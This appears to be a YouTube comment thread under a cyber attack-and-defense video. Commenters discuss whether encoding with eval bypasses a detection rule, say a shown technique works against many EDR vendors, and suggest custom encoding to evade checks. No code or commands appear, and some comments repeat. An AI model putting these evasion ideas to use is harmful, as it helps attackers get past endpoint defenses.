Not my field of expertise normally, but just encoding and using eval or equivalent would by pass your check...? Edit: ahh, of course, you are checking for eval-like keywords as well.
Good question! Any rule I would use in practice would be much more robust in looking for encoding evaluation statements and the like. The good thing is first pass on many forms of encoding is done by windows. Nothing substitutes dynamic analysis with breakpoints though.
Another awesome presentation. Thank you for sharing
Thanks for watching!
Another great content! Your hard work and creativity really shine through. Keep up the awesome work!
Thank you for showcasing my tool sir
It works! Thanks for your research!
Let’s get it another cyber attack&defense vid
Good topic for all merci
Awesome, looking forward to more
Thanks! Keep watching for more!
Does it affect different EDR vendors by chance?
It should work against many EDR vendors. You would need to test your specific vendor. I did test against some of the bigger ones and it worked.
❤
Not my field of expertise normally, but just encoding and using eval or equivalent would by pass your check...?
Edit: ahh, of course, you are checking for eval-like keywords as well.
Good question! Any rule I would use in practice would be much more robust in looking for encoding evaluation statements and the like. The good thing is first pass on many forms of encoding is done by windows. Nothing substitutes dynamic analysis with breakpoints though.
@@CyberAttackDefense just implement a custom encoding, that's pretty common.